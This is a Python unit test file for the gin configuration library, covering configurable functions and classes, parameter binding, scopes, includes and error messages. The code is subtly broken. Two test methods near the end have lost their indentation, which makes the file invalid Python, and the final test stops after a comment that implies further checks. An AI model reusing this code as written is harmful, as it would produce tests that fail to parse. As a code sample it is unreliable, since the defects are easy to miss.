# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import inspect
import io
import logging
import os
import threading
from absl.testing import absltest
import enum
from gin import config
import six
_EXPECTED_OPERATIVE_CONFIG_STR = """
import gin.testdata.import_test_configurables
# Macros:
# ==============================================================================
pen_names = ['Pablo Neruda', 'Voltaire', 'Snoop Lion']
super/sweet = 'lugduname'
# Parameters for configurable1:
# ==============================================================================
configurable1.kwarg1 = \\
'a super duper extra double very wordy string that is just plain long'
configurable1.kwarg2 = None
configurable1.kwarg3 = @configurable2
# Parameters for configurable2:
# ==============================================================================
configurable2.non_kwarg = 'ferret == domesticated polecat'
# Parameters for ConfigurableClass:
# ==============================================================================
ConfigurableClass.kwarg1 = 'statler'
ConfigurableClass.kwarg2 = 'waldorf'
# Parameters for test/scopes/ConfigurableClass:
# ==============================================================================
test/scopes/ConfigurableClass.kwarg1 = 'statler'
test/scopes/ConfigurableClass.kwarg2 = 'beaker'
# Parameters for ConfigurableSubclass:
# ==============================================================================
ConfigurableSubclass.kwarg1 = 'waldorf'
ConfigurableSubclass.kwarg2 = None
ConfigurableSubclass.kwarg3 = 'ferret'
# Parameters for woolly.sheep.dolly:
# ==============================================================================
woolly.sheep.dolly.kwarg = 0
# Parameters for no_arg_fn:
# ==============================================================================
# None.
# Parameters for var_arg_fn:
# ==============================================================================
var_arg_fn.any_name_is_ok = [%THE_ANSWER, %super/sweet, %pen_names]
var_arg_fn.dict_value = {'success': True}
var_arg_fn.float_value = 2.718
var_arg_fn.non_kwarg2 = \\
{'long': ['nested',
'structure',
('that', 'will', 'span'),
'more',
('than', 1),
'line']}
"""
_EXPECTED_CONFIG_STR = """
import gin.testdata.import_test_configurables
# Macros:
# ==============================================================================
pen_names = ['Pablo Neruda', 'Voltaire', 'Snoop Lion']
super/sweet = 'lugduname'
# Parameters for configurable1:
# ==============================================================================
configurable1.kwarg1 = \\
'a super duper extra double very wordy string that is just plain long'
configurable1.kwarg3 = @configurable2
# Parameters for configurable2:
# ==============================================================================
configurable2.non_kwarg = 'ferret == domesticated polecat'
# Parameters for ConfigurableClass:
# ==============================================================================
ConfigurableClass.kwarg1 = 'statler'
ConfigurableClass.kwarg2 = 'waldorf'
# Parameters for test/scopes/ConfigurableClass:
# ==============================================================================
test/scopes/ConfigurableClass.kwarg2 = 'beaker'
# Parameters for ConfigurableSubclass:
# ==============================================================================
ConfigurableSubclass.kwarg1 = 'waldorf'
ConfigurableSubclass.kwarg3 = 'ferret'
# Parameters for woolly.sheep.dolly:
# ==============================================================================
woolly.sheep.dolly.kwarg = 0
# Parameters for var_arg_fn:
# ==============================================================================
var_arg_fn.any_name_is_ok = [%THE_ANSWER, %super/sweet, %pen_names]
var_arg_fn.dict_value = {'success': True}
var_arg_fn.float_value = 2.718
var_arg_fn.non_kwarg2 = \\
{'long': ['nested',
'structure',
('that', 'will', 'span'),
'more',
('than', 1),
'line']}
"""
@config.configurable('configurable1')
def fn1(non_kwarg, kwarg1=None, kwarg2=None, kwarg3=None):
  """Test configurable registered under the name 'configurable1'."""
  return (non_kwarg, kwarg1, kwarg2, kwarg3)
@config.configurable
def configurable2(non_kwarg, kwarg1=None):
  """Test configurable with one positional and one keyword argument."""
  return (non_kwarg, kwarg1)
@config.configurable(whitelist=['whitelisted'])
def whitelisted_configurable(whitelisted=None, other=None):
  """Only the 'whitelisted' parameter may be bound through gin."""
  return (whitelisted, other)
@config.configurable(blacklist=['blacklisted'])
def blacklisted_configurable(blacklisted=None, other=None):
  """The 'blacklisted' parameter may not be bound through gin."""
  return (blacklisted, other)
@config.configurable
def required_args(arg1, arg2, arg3, kwarg1=4, kwarg2=5, kwarg3=6):
  """Configurable with three required positional arguments."""
  return (arg1, arg2, arg3, kwarg1, kwarg2, kwarg3)
@config.configurable
def required_with_vargs(arg1, arg2, arg3, *args, **kwargs):
  """Like required_args, but also accepting *args and **kwargs."""
  return (arg1, arg2, arg3, args, kwargs)
@config.configurable
def required_with_vkwargs(arg1, arg2, arg3, kwarg1=4, kwarg2=5, kwarg3=6,
                          **kwargs):
  """Like required_args, but also accepting extra keyword arguments."""
  return (arg1, arg2, arg3, kwarg1, kwarg2, kwarg3, kwargs)
@config.configurable
def no_arg_fn():
  """A configurable function accepting no parameters at all."""
@config.configurable
def var_arg_fn(non_kwarg1, non_kwarg2, *args, **kwargs):
  """Returns all positional args, then kwarg values ordered by key name."""
  ordered = [non_kwarg1, non_kwarg2]
  ordered.extend(args)
  for key in sorted(kwargs):
    ordered.append(kwargs[key])
  return ordered
@config.configurable('dolly', module='__main__')
def clone0(kwarg=None):
  """Registered as '__main__.dolly'."""
  value = kwarg
  return value
@config.configurable('dolly', module='a.furry.sheep')
def clone1(kwarg=None):
  """Registered as 'a.furry.sheep.dolly'."""
  value = kwarg
  return value
@config.configurable('dolly', module='a.woolly.sheep')
def clone2(kwarg=None):
  """Registered as 'a.woolly.sheep.dolly'."""
  value = kwarg
  return value
@config.configurable('a.fuzzy.sheep.dolly')
def clone3(kwarg=None):
  """Registered with the module embedded in the name itself."""
  value = kwarg
  return value
@config.configurable('sheep.dolly', module='a.hairy')
def clone4(kwarg=None):
  """Registered with the module split between name and module arguments."""
  value = kwarg
  return value
@config.configurable
def new_object():
  """Returns a fresh object instance on every call."""
  return object()
@config.configurable
def required_as_kwarg_default(positional_arg, required_kwarg=config.REQUIRED):
  """A configurable whose keyword argument defaults to config.REQUIRED."""
  return (positional_arg, required_kwarg)
@config.configurable
class ConfigurableClass(object):
  """A configurable class."""

  def __init__(self, kwarg1=None, kwarg2=None):
    """Stores both keyword arguments as instance attributes."""
    self.kwarg2 = kwarg2
    self.kwarg1 = kwarg1
@config.configurable
class ConfigurableSubclass(ConfigurableClass):
  """A subclass of a configurable class."""

  def __init__(self, kwarg1=None, kwarg2=None, kwarg3=None):
    """Delegates kwarg1/kwarg2 to the superclass and stores kwarg3."""
    super(ConfigurableSubclass, self).__init__(kwarg1, kwarg2)
    self.kwarg3 = kwarg3
# Plain namedtuple used as the base for the configurable named tuple tests.
NamedTuple = collections.namedtuple(
    'ConfigurableNamedTuple', ['field1', 'field2'])
@config.configurable
class ConfigurableNamedTuple(NamedTuple):
  """Configurable subclass of the plain test named tuple."""
# Register the plain named tuple as an external (undecorated) configurable.
configurable_external_named_tuple = config.external_configurable(
    NamedTuple, 'ExternalConfigurableNamedTuple')
@config.configurable
class ObjectSubclassWithoutInit(object):
  """A class that subclasses object but doesn't define its own __init__.

  While there's nothing to configure in this class, it may still be desirable to
  instantiate such a class from within Gin and bind it to something else.
  """

  # Registered with an explicit module so config strings can reference it as
  # ObjectSubclassWithoutInit.method.
  @config.configurable(module='ObjectSubclassWithoutInit')
  def method(self, arg1='default'):
    return arg1
class ExternalClass(object):
  """A class we'll pretend was defined somewhere else."""

  # Pretend the class originates from another module.
  __module__ = 'timbuktu'

  def __init__(self, kwarg1=None, kwarg2=None):
    """Stores both keyword arguments as instance attributes."""
    self.kwarg2 = kwarg2
    self.kwarg1 = kwarg1
# Register ExternalClass with gin under two different configurable names.
configurable_external_class = config.external_configurable(
    ExternalClass, 'ExternalConfigurable')
config.external_configurable(ExternalClass, 'module.ExternalConfigurable2')
@config.configurable
class ConfigurableExternalSubclass(configurable_external_class):
  """Subclassing an external configurable object.

  This is a configurable subclass (of the configurable subclass implicitly
  created by external_configurable) of the ExternalClass class.
  """

  def __init__(self, kwarg1=None, kwarg2=None, kwarg3=None):
    """Stores kwarg3 and forwards kwarg1/kwarg2 to the external base."""
    self.kwarg3 = kwarg3
    super(ConfigurableExternalSubclass, self).__init__(
        kwarg1=kwarg1, kwarg2=kwarg2)
class AbstractConfigurable(object):
  """Abstract base class used by the abstract-configurable tests."""

  # NOTE(review): `__metaclass__` is Python 2 syntax and is ignored under
  # Python 3, so abstractmethod enforcement only applies on Python 2 -
  # confirm whether six.with_metaclass was intended here.
  __metaclass__ = abc.ABCMeta

  def __init__(self, kwarg1=None):
    self.kwarg1 = kwarg1

  @abc.abstractmethod
  def implement_me(self):
    pass
@config.configurable
class AbstractConfigurableSubclass(AbstractConfigurable):
  """Concrete, configurable subclass of AbstractConfigurable."""

  def __init__(self, kwarg1=None, kwarg2=None):
    """Forwards kwarg1 to the abstract base and stores kwarg2."""
    super(AbstractConfigurableSubclass, self).__init__(kwarg1=kwarg1)
    self.kwarg2 = kwarg2

  @config.configurable
  def implement_me(self, method_arg='arglebargle'):
    """Configurable method satisfying the abstract interface."""
    return method_arg
class ExternalAbstractConfigurableSubclass(AbstractConfigurable):
  """Concrete subclass registered via external_configurable (see below)."""

  def implement_me(self):
    """Trivial implementation of the abstract method."""
# Register the external subclass without decorating its definition.
config.external_configurable(ExternalAbstractConfigurableSubclass)
class ConfigTest(absltest.TestCase):
  def tearDown(self):
    # Reset all gin bindings and constants so each test starts clean.
    config.clear_config(clear_constants=True)
    super(ConfigTest, self).tearDown()
  def testConfigurable(self):
    # bind_parameter supplies kwargs; the positional arg must still be passed.
    config.bind_parameter('configurable1.kwarg1', 'value1')
    config.bind_parameter('configurable1.kwarg2', 'value2')
    self.assertEqual(fn1('value0'), ('value0', 'value1', 'value2', None))
  def testInvalidNameOrModule(self):
    # Configurable names and modules must be valid (dotted) identifiers.
    with six.assertRaisesRegex(self, ValueError, 'invalid.$'):
      config.configurable('0ops')(lambda _: None)
    with six.assertRaisesRegex(self, ValueError, 'invalid.$'):
      config.configurable('')(lambda _: None)
    with six.assertRaisesRegex(self, ValueError, 'Module .* invalid'):
      config.configurable('ok', module='not.0k')(lambda _: None)
    with six.assertRaisesRegex(self, ValueError, 'Module .* invalid'):
      config.configurable('fine', module='')(lambda _: None)
  def testParseConfigFromFilelike(self):
    # parse_config accepts any file-like object, not just strings/lists.
    config_str = u"""
      configurable1.kwarg1 = 'stringval'
      configurable1.kwarg2 = 0
      configurable1.kwarg3 = [0, 1, 'hello']
    """
    string_io = io.StringIO(config_str)
    config.parse_config(string_io)
    self.assertEqual(fn1('value0'), ('value0', 'stringval', 0, [0, 1, 'hello']))
  def testParseConfigFromSingleString(self):
    # A single multi-line string is split into bindings internally.
    config_str = """
      configurable1.kwarg1 = 'stringval'
      configurable1.kwarg2 = 0
      configurable1.kwarg3 = [0, 1, 'hello']
    """
    config.parse_config(config_str)
    self.assertEqual(fn1('value0'), ('value0', 'stringval', 0, [0, 1, 'hello']))
  def testParseConfigFromList(self):
    # A list of binding strings is also accepted by parse_config.
    config_str = [
        'configurable1.kwarg1 = "stringval"', 'configurable1.kwarg2 = 0',
        'configurable1.kwarg3 = [0, 1, "hello"]'
    ]
    config.parse_config(config_str)
    self.assertEqual(fn1('value0'), ('value0', 'stringval', 0, [0, 1, 'hello']))
  def testParseConfigImportsAndIncludes(self):
    # `import` executes a Python module; `include` splices in another
    # config file resolved against the test source dir.
    config_str = """
      import gin.testdata.import_test_configurables
      include '{}gin/testdata/my_other_func.gin'
      identity.param = 'success'
      ConfigurableClass.kwarg1 = @identity()
      ConfigurableClass.kwarg2 = @my_other_func()
    """
    config.parse_config(config_str.format(absltest.get_default_test_srcdir()))
    self.assertEqual(ConfigurableClass().kwarg1, 'success')
    self.assertEqual(ConfigurableClass().kwarg2, (-2.9, 9.3, 'Oh, Dear.'))
    with six.assertRaisesRegex(self, ImportError, 'No module'):
      config.parse_config('import nonexistent.module')
    with self.assertRaises(IOError):
      config.parse_config("include 'nonexistent/file'")
  def testInvalidIncludeError(self):
    # A bad nested include surfaces the offending path in the IOError.
    config_file = '{}gin/testdata/invalid_include.gin'
    path_prefix = absltest.get_default_test_srcdir()
    err_msg_regex = ('Unable to open file: not/a/valid/file.gin. '
                     'Searched config paths:')
    with six.assertRaisesRegex(self, IOError, err_msg_regex):
      config.parse_config_file(config_file.format(path_prefix))
  def testExplicitParametersOverrideGin(self):
    # Values passed at the call site win over gin bindings.
    config_str = """
      configurable1.non_kwarg = 'non_kwarg'
      configurable1.kwarg1 = 'kwarg1'
      configurable1.kwarg3 = 'kwarg3'
    """
    config.parse_config(config_str)
    # pylint: disable=no-value-for-parameter
    non_kwarg, kwarg1, kwarg2, kwarg3 = fn1(kwarg1='ahoy', kwarg3='matey!')
    # pylint: enable=no-value-for-parameter
    self.assertEqual(non_kwarg, 'non_kwarg')
    self.assertEqual(kwarg1, 'ahoy')
    self.assertEqual(kwarg2, None)
    self.assertEqual(kwarg3, 'matey!')
  def testUnknownReference(self):
    # Binding a parameter of an unregistered configurable is an error; the
    # message includes the line number within the bindings string.
    config_str = """
      ConfigurableClass.kwarg1 = 'okie dokie'
      unknown.kwarg1 = 'kwarg1'
    """
    expected_err_msg = ("No configurable matching 'unknown'.\n"
                        "  In bindings string line 3")
    with six.assertRaisesRegex(self, ValueError, expected_err_msg):
      config.parse_config(config_str)
  def testSkipUnknown(self):
    # skip_unknown accepts a whitelist of names or True to skip everything
    # unknown; valid bindings are still applied.
    config_str = """
      ConfigurableClass.kwarg1 = 'okie dokie'
      unknown.kwarg1 = 'kwarg1'
    """
    with self.assertRaises(ValueError):
      config.parse_config(config_str)
    expected_err_msg = "No configurable matching 'unknown'"
    with six.assertRaisesRegex(self, ValueError, expected_err_msg):
      config.parse_config(config_str, skip_unknown=['moose'])
    config.parse_config(config_str, skip_unknown=['unknown'])
    config.parse_config(config_str, skip_unknown=True)
    self.assertEqual(ConfigurableClass().kwarg1, 'okie dokie')
  def testSkipUnknownImports(self):
    # With skip_unknown=True a failing import is logged (without a
    # traceback for a directly-missing module) instead of raising.
    config_str = """
      import not.a.real.module
    """
    with self.assertRaises(ImportError):
      config.parse_config(config_str)
    with absltest.mock.patch.object(logging, 'info') as mock_log:
      config.parse_config(config_str, skip_unknown=True)
      found_log = False
      for log in mock_log.call_args_list:
        log = log[0][0] % tuple(log[0][1:])
        if 'not.a.real.module' in log:
          if 'Traceback' in log:
            self.fail('Traceback included for non-nested unknown import log.')
          else:
            found_log = True
            break
    self.assertTrue(
        found_log, msg='Did not log import error.')
  def testSkipUnknownNestedImport(self):
    # When the imported module itself raises ImportError (nested failure),
    # the skip log must include the traceback for debuggability.
    config_str = """
      import gin.testdata.invalid_import
    """
    with self.assertRaises(ImportError):
      config.parse_config(config_str)
    with absltest.mock.patch.object(logging, 'info') as mock_log:
      config.parse_config(config_str, skip_unknown=True)
      found_log = False
      for args, _ in mock_log.call_args_list:
        log = args[0] % tuple(args[1:])
        if 'gin.testdata.invalid_import' in log and 'Traceback' in log:
          found_log = True
          break
    self.assertTrue(
        found_log, msg='Did not log traceback of nested import error.')
  def testSkipUnknownReference(self):
    # Skipped unknown @references defer the error to when the binding that
    # contains them is actually used (or to config.finalize()).
    config_str = """
      ConfigurableClass.kwarg1 = [1, @UnknownReference()]
      ConfigurableClass.kwarg2 = 12345
      configurable2.kwarg1 = 'bog snorkelling'
      unknown.kwarg1 = @UnknownReference
    """
    expected_err_msg = (
        r"No configurable matching reference '@UnknownReference\(\)'")
    with six.assertRaisesRegex(self, ValueError, expected_err_msg):
      config.parse_config(config_str)
    with six.assertRaisesRegex(self, ValueError, expected_err_msg):
      config.parse_config(config_str, skip_unknown=['moose'])
    config.parse_config(
        config_str, skip_unknown=['UnknownReference', 'unknown'])
    _, kwarg1_val = configurable2(None)
    self.assertEqual(kwarg1_val, 'bog snorkelling')
    config.parse_config(config_str, skip_unknown=True)
    _, kwarg1_val = configurable2(None)
    self.assertEqual(kwarg1_val, 'bog snorkelling')
    # The binding containing the skipped reference still fails on use.
    with six.assertRaisesRegex(self, ValueError, expected_err_msg):
      ConfigurableClass()
    addl_msg = ".* In binding for 'ConfigurableClass.kwarg1'"
    with six.assertRaisesRegex(self, ValueError, expected_err_msg + addl_msg):
      config.finalize()
    # Rebinding over the broken value makes everything consistent again.
    config.bind_parameter('ConfigurableClass.kwarg1', 'valid')
    instance = ConfigurableClass()
    config.finalize()
    self.assertEqual(instance.kwarg1, 'valid')
    self.assertEqual(instance.kwarg2, 12345)
  def testParameterValidation(self):
    # Functions with **kwargs accept any binding name; others are checked.
    config.parse_config('var_arg_fn.anything_is_fine = 0')
    err_regexp = ".* doesn't have a parameter.*\n  In bindings string line 1"
    with six.assertRaisesRegex(self, ValueError, err_regexp):
      config.parse_config('configurable2.not_a_parameter = 0')
    with six.assertRaisesRegex(self, ValueError, err_regexp):
      config.parse_config('ConfigurableClass.not_a_parameter = 0')
    # ('lamdba1' typo preserved - it is just a registration name here.)
    config.external_configurable(lambda arg: arg, 'lamdba1', blacklist=['arg'])
    config.external_configurable(lambda arg: arg, 'lambda2', whitelist=['arg'])
    err_regexp = '.* not a parameter of'
    with six.assertRaisesRegex(self, ValueError, err_regexp):
      config.external_configurable(
          lambda arg: arg, 'lambda3', blacklist=['nonexistent'])
    with six.assertRaisesRegex(self, ValueError, err_regexp):
      config.external_configurable(
          lambda arg: arg, 'lambda4', whitelist=['nonexistent'])
  def testMissingPositionalParameter(self):
    # The TypeError lists missing, gin-bound, and caller-supplied params.
    config.parse_config("""
      required_args.arg2 = None
      required_args.kwarg2 = None
    """)
    err_regexp = (r".*\n No values supplied .*: \['arg3'\]\n"
                  r" Gin had values bound for: \['arg2', 'kwarg2'\]\n"
                  r" Caller supplied values for: \['arg1', 'kwarg1'\]")
    with six.assertRaisesRegex(self, TypeError, err_regexp):
      required_args(None, kwarg1=None)  # pylint: disable=no-value-for-parameter
  def testMissingPositionalParameterVarargs(self):
    # Same missing-parameter report for a function that also takes *args.
    config.parse_config("""
      required_with_vargs.arg2 = None
      required_with_vargs.kwarg2 = None
    """)
    err_regexp = (r".*\n No values supplied .*: \['arg3'\]\n"
                  r" Gin had values bound for: \['arg2', 'kwarg2'\]\n"
                  r" Caller supplied values for: \['arg1', 'kwarg1'\]")
    with six.assertRaisesRegex(self, TypeError, err_regexp):
      # pylint: disable=no-value-for-parameter
      required_with_vargs(None, kwarg1=None)
  def testSubclassParametersOverrideSuperclass(self):
    # Bindings target the concrete class: subclass bindings don't leak into
    # the superclass and vice versa.
    config_str = """
      ConfigurableClass.kwarg1 = 'base_kwarg1'
      ConfigurableClass.kwarg2 = 'base_kwarg2'
      ConfigurableSubclass.kwarg1 = 'sub_kwarg1'
      ConfigurableSubclass.kwarg2 = 'sub_kwarg2'
      ConfigurableSubclass.kwarg3 = 'sub_kwarg3'
    """
    config.parse_config(config_str)
    base = ConfigurableClass()
    self.assertEqual(base.kwarg1, 'base_kwarg1')
    self.assertEqual(base.kwarg2, 'base_kwarg2')
    sub = ConfigurableSubclass()
    self.assertEqual(sub.kwarg1, 'sub_kwarg1')
    self.assertEqual(sub.kwarg2, 'sub_kwarg2')
    self.assertEqual(sub.kwarg3, 'sub_kwarg3')
  def testPositionalArgumentsOverrideConfig(self):
    # A positional argument supplied by the caller beats the gin binding,
    # while duplicate positional/keyword supply still raises TypeError.
    config_str = """
      configurable2.non_kwarg = 'non_kwarg'
    """
    config.parse_config(config_str)
    # Our Gin config works.
    non_kwarg, _ = configurable2()  # pylint: disable=no-value-for-parameter
    self.assertEqual(non_kwarg, 'non_kwarg')
    # Gin gets overridden by an explicitly supplied positional argument.
    non_kwarg, _ = configurable2('overridden')
    self.assertEqual(non_kwarg, 'overridden')
    # But we haven't broken a legitimate error.
    with self.assertRaises(TypeError):
      # pylint: disable=redundant-keyword-arg
      configurable2('positional', non_kwarg='duplicate')
      # pylint: enable=redundant-keyword-arg
  def testParseConfigurableReferences(self):
    # @name() evaluates the configurable (optionally scoped); @name passes
    # the callable itself.
    config_str = """
      configurable1.kwarg1 = 'stringval'
      configurable1.kwarg2 = @scoped/configurable2()
      configurable1.kwarg3 = @configurable2
      scoped/configurable2.non_kwarg = 'wombat'
      configurable2.kwarg1 = {'success': True}
    """
    config.parse_config(config_str)
    value0, value1, value2, value3 = fn1('value0')
    self.assertEqual((value0, value1), ('value0', 'stringval'))
    self.assertEqual(value2, ('wombat', {'success': True}))
    self.assertTrue(callable(value3))
    self.assertEqual(value3('muppeteer'), ('muppeteer', {'success': True}))
  def testConfigurableClass(self):
    # Constructor kwargs of a configurable class are injectable via gin.
    config_str = """
      ConfigurableClass.kwarg1 = 'statler'
      ConfigurableClass.kwarg2 = 'waldorf'
    """
    config.parse_config(config_str)
    instance = ConfigurableClass()
    self.assertEqual(instance.kwarg1, 'statler')
    self.assertEqual(instance.kwarg2, 'waldorf')
  def testConfigurableReferenceClassIdentityIsPreserved(self):
    """An uncalled class reference yields a class; a called one an instance."""
    config_str = """
        ConfigurableClass.kwarg1 = 'hi'
        configurable2.non_kwarg = @ConfigurableClass
        configurable2.kwarg1 = @ConfigurableClass()
    """
    config.parse_config(config_str)
    # pylint: disable=no-value-for-parameter
    reference, instance = configurable2()
    # pylint: enable=no-value-for-parameter
    self.assertTrue(inspect.isclass(reference))
    self.assertTrue(issubclass(reference, ConfigurableClass))
    self.assertIsInstance(instance, ConfigurableClass)
  def testConfigurableSubclass(self):
    """Subclass and superclass references keep independent bindings."""
    config_str = """
        configurable2.non_kwarg = @ConfigurableSubclass
        configurable2.kwarg1 = @ConfigurableClass
        ConfigurableClass.kwarg1 = 'one'
        ConfigurableSubclass.kwarg1 = 'some'
        ConfigurableSubclass.kwarg3 = 'thing'
    """
    config.parse_config(config_str)
    # pylint: disable=no-value-for-parameter
    sub_cls_ref, super_cls_ref = configurable2()
    # pylint: enable=no-value-for-parameter
    self.assertTrue(inspect.isclass(super_cls_ref))
    self.assertTrue(inspect.isclass(sub_cls_ref))
    sub_instance = sub_cls_ref()
    super_instance = super_cls_ref()
    self.assertTrue(issubclass(sub_cls_ref, ConfigurableClass))
    self.assertIsInstance(sub_instance, ConfigurableClass)
    # Because references always wrap the original class via subclassing, other
    # subclasses of the original class are not subclasses of the reference.
    self.assertFalse(issubclass(sub_cls_ref, super_cls_ref))
    self.assertNotIsInstance(sub_instance, super_cls_ref)
    self.assertNotIsInstance(sub_instance, type(super_instance))
    # Each class picked up only its own bindings (unbound kwargs stay None).
    self.assertEqual(super_instance.kwarg1, 'one')
    self.assertEqual(super_instance.kwarg2, None)
    self.assertEqual(sub_instance.kwarg1, 'some')
    self.assertEqual(sub_instance.kwarg2, None)
    self.assertEqual(sub_instance.kwarg3, 'thing')
  def testConfigurableMethod(self):
    """A configurable method receives its bindings when called on an instance."""
    config_str = """
        configurable2.non_kwarg = @scoped/AbstractConfigurableSubclass()
        implement_me.method_arg = 'bananaphone'
    """
    config.parse_config(config_str)
    instance, _ = configurable2()  # pylint: disable=no-value-for-parameter
    self.assertEqual(instance.implement_me(), 'bananaphone')
  def testExternalConfigurableClass(self):
    """external_configurable wrappers subclass and mimic the wrapped class."""
    config_str = """
        ConfigurableClass.kwarg1 = @ExternalConfigurable
        ConfigurableClass.kwarg2 = @module.ExternalConfigurable2
        ExternalConfigurable.kwarg1 = 'statler'
        ExternalConfigurable.kwarg2 = 'waldorf'
    """
    config.parse_config(config_str)
    configurable_class = ConfigurableClass()
    cls = configurable_class.kwarg1
    # The wrapper is a subclass that preserves module, name, and docstring.
    self.assertTrue(issubclass(cls, ExternalClass))
    self.assertEqual(cls.__module__, ExternalClass.__module__)
    self.assertEqual(cls.__name__, ExternalClass.__name__)
    self.assertEqual(cls.__doc__, ExternalClass.__doc__)
    self.assertTrue(issubclass(configurable_class.kwarg2, ExternalClass))
    instance = cls()
    self.assertIsInstance(instance, ExternalClass)
    self.assertEqual(instance.kwarg1, 'statler')
    self.assertEqual(instance.kwarg2, 'waldorf')
  def testAbstractExternalConfigurableClass(self):
    """An external configurable subclass of an ABC can be instantiated via Gin."""
    config_str = """
        configurable2.non_kwarg = @ExternalAbstractConfigurableSubclass()
        configurable2.kwarg1 = @ConfigurableClass()
        ExternalAbstractConfigurableSubclass.kwarg1 = 'fish'
    """
    config.parse_config(config_str)
    # pylint: disable=no-value-for-parameter
    instance, not_instance = configurable2()
    # pylint: enable=no-value-for-parameter
    self.assertIsInstance(instance, AbstractConfigurable)
    self.assertNotIsInstance(not_instance, AbstractConfigurable)
  def testImplicitlyScopedConfigurableClass(self):
    """Scoped references to the same class yield distinct, scoped bindings."""
    config_str = """
        configurable2.non_kwarg = @scope1/ConfigurableClass
        configurable2.kwarg1 = @scope2/ConfigurableClass
        scope1/ConfigurableClass.kwarg1 = 'scope1arg1'
        scope1/ConfigurableClass.kwarg2 = 'scope1arg2'
        scope2/ConfigurableClass.kwarg1 = 'scope2arg1'
        scope2/ConfigurableClass.kwarg2 = 'scope2arg2'
    """
    config.parse_config(config_str)
    # pylint: disable=no-value-for-parameter
    scope1_cls, scope2_cls = configurable2()
    # pylint: enable=no-value-for-parameter
    # The scoped wrapper still mimics the original class's metadata.
    self.assertEqual(scope1_cls.__module__, ConfigurableClass.__module__)
    self.assertEqual(scope1_cls.__name__, ConfigurableClass.__name__)
    self.assertEqual(scope1_cls.__doc__, ConfigurableClass.__doc__)
    scope1_instance = scope1_cls()
    scope2_instance = scope2_cls()
    self.assertEqual(scope1_instance.kwarg1, 'scope1arg1')
    self.assertEqual(scope1_instance.kwarg2, 'scope1arg2')
    self.assertEqual(scope2_instance.kwarg1, 'scope2arg1')
    self.assertEqual(scope2_instance.kwarg2, 'scope2arg2')
  def testImplicitlyScopedExternalConfigurableAndSubclass(self):
    """Implicit scopes work for external configurables and their subclasses."""
    config_str = """
        configurable2.non_kwarg = @scope1/ExternalConfigurable
        configurable2.kwarg1 = @scope2/ConfigurableExternalSubclass
        scope1/ExternalConfigurable.kwarg1 = 'one'
        scope2/ConfigurableExternalSubclass.kwarg2 = 'two'
        scope2/ConfigurableExternalSubclass.kwarg3 = 'three'
    """
    config.parse_config(config_str)
    # pylint: disable=no-value-for-parameter
    super_cls, sub_cls = configurable2()
    # pylint: enable=no-value-for-parameter
    self.assertTrue(issubclass(super_cls, ExternalClass))
    self.assertTrue(issubclass(sub_cls, ExternalClass))
    self.assertTrue(issubclass(sub_cls, ConfigurableExternalSubclass))
    super_instance, sub_instance = super_cls(), sub_cls()
    self.assertIsInstance(super_instance, ExternalClass)
    self.assertIsInstance(sub_instance, ConfigurableExternalSubclass)
    self.assertIsInstance(sub_instance, ExternalClass)
    # Only each scope's own bindings apply; everything else defaults to None.
    self.assertEqual(super_instance.kwarg1, 'one')
    self.assertEqual(super_instance.kwarg2, None)
    self.assertEqual(sub_instance.kwarg1, None)
    self.assertEqual(sub_instance.kwarg2, 'two')
    self.assertEqual(sub_instance.kwarg3, 'three')
  def testAbstractConfigurableSubclass(self):
    """Scoped bindings apply both inside config_scope and via a reference."""
    config_str = """
        configurable2.non_kwarg = @scoped/AbstractConfigurableSubclass()
        scoped/AbstractConfigurableSubclass.kwarg1 = 'kwarg1'
        scoped/AbstractConfigurableSubclass.kwarg2 = 'kwarg2'
    """
    config.parse_config(config_str)
    with config.config_scope('scoped'):
      instance = AbstractConfigurableSubclass()
      self.assertEqual(instance.kwarg1, 'kwarg1')
      self.assertEqual(instance.kwarg2, 'kwarg2')
      self.assertEqual(instance.implement_me(method_arg='gouda'), 'gouda')
    # Also try when creating from a configurable reference.
    instance, _ = configurable2()  # pylint: disable=no-value-for-parameter
    self.assertEqual(instance.kwarg1, 'kwarg1')
    self.assertEqual(instance.kwarg2, 'kwarg2')
    self.assertEqual(instance.implement_me(method_arg='havarti'), 'havarti')
  def testConfigurableObjectSubclassWithoutInit(self):
    """A class with no __init__ of its own can still be made configurable."""
    config_str = """
        ConfigurableClass.kwarg1 = @ObjectSubclassWithoutInit()
        ObjectSubclassWithoutInit.method.arg1 = 'valuesaurus'
    """
    config.parse_config(config_str)
    subclass_instance = ConfigurableClass().kwarg1
    self.assertIsInstance(subclass_instance, ObjectSubclassWithoutInit)
    self.assertEqual(subclass_instance.method(), 'valuesaurus')
def testExternalConfigurableMethodWrapper(self):
obj_maker = config.external_configurable(object.__call__, 'obj_call')
self.assertIsInstance(obj_maker(), object)
def testExternalConfigurableBuiltin(self):
wrapped_sum = config.external_configurable(sum)
self.assertEqual(wrapped_sum([1, 2, 3]), 6)
  def testConfigurableNamedTuple(self):
    """Namedtuple fields are bindable for local and external namedtuples."""
    config_str = """
        ConfigurableNamedTuple.field1 = 'field1'
        ConfigurableNamedTuple.field2 = 'field2'
        ExternalConfigurableNamedTuple.field1 = 'external_field1'
        ExternalConfigurableNamedTuple.field2 = 'external_field2'
    """
    config.parse_config(config_str)
    configurable_named_tuple = ConfigurableNamedTuple()
    self.assertEqual(configurable_named_tuple.field1, 'field1')
    self.assertEqual(configurable_named_tuple.field2, 'field2')
    configurable_named_tuple = configurable_external_named_tuple()
    self.assertEqual(configurable_named_tuple.field1, 'external_field1')
    self.assertEqual(configurable_named_tuple.field2, 'external_field2')
  def testFailedFunctionCall(self):
    """Errors raised inside a configurable name the configurable (and scope)."""
    def some_fn(only_one_arg=None):
      del only_one_arg
    @config.configurable('broken_function')
    def borked_fn(arg):  # pylint: disable=unused-variable
      # Deliberately broken: passes a kwarg some_fn doesn't accept.
      some_fn(nonexistent_arg=arg)  # pylint: disable=unexpected-keyword-arg
    config.parse_config([
        'configurable2.non_kwarg = @broken_function()',
        'ConfigurableClass.kwarg1 = @scoped/broken_function()',
        'broken_function.arg = "mulberries"'
    ])
    # The TypeError message should identify the failing configurable...
    expected_msg_regexp = r"'broken_function' \(<function .*borked_fn.*\)$"
    with six.assertRaisesRegex(self, TypeError, expected_msg_regexp):
      configurable2()  # pylint: disable=no-value-for-parameter
